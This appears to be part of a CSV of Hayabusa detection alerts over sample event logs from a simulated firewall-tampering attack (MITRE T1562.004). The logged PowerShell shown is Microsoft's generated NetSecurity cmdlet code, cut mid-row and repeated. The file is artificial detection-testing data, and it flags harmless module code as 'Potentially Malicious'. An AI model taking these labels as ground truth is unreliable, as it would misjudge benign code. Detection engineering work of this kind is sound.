throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, 
Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
